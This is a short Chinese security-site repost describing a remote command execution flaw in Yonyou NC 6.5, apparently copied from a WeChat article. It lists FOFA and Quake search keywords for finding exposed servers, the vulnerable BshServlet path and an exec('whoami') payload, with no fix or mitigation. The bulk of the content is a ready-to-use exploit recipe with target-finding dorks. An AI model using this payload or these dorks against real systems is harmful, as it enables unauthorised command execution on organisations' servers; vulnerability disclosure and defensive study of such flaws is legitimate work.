一、影响范围
nc 6.5
二、搜索引擎关键字
quake关键字
icon_hash="1085941792"fofa关键字
app="用友-UFIDA-NC"
三、漏洞复现
访问漏洞URL
/servlet/~ic/bsh.servlet.BshServlet
payload
exec("whoami");
原文始发于微信公众号(we1x4n):用友NC bsh.servlet.BshServlet命令执行漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
- 本文由 admin 发表于 2022年4月26日06:48:34
- 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
用友NC bsh.servlet.BshServlet命令执行漏洞http://cn-sec.com/archives/853684.html
评论